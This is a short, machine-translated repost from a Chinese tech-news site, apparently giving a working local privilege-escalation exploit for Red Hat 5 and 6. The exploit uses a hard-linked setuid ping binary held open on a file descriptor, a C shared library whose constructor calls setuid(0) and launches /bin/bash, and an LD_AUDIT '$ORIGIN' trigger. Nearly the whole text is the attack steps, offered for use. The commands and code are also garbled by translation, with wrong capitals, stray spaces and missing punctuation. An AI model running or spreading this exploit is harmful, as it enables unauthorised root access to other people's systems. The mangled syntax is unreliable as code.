Shulou(Shulou.com)06/01 Report--

Vulnerability trial system: redhat 5-6 Universal

one。 Use / tmp to have 777 permissions

Create an exploit directory under / tmp

Ln / bin/ping (the special permission of the ping command is S, and you can have the master permission of the command instantly when an ordinary user uses it. Here is root)

Ln / bin/ping / tmp/exploit/target

Exec 3 < / tmp/exploit/target

Rm-rf / tmp/exploit/

II. Vim write a C language program (file name payload.c)

Void _ _ attribute__ ((constructor)) init () / / here _ _ are two underscores

{

Setuid (0)

System ("/ bin/bash")

}

Compile this file using GCC

Gcc-w-fpic-shared-o / tmp/exploit payload.c

three。 Execution

LD_AUDIT= "\ $ORIGIN" exec/proc/self/fd/3

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.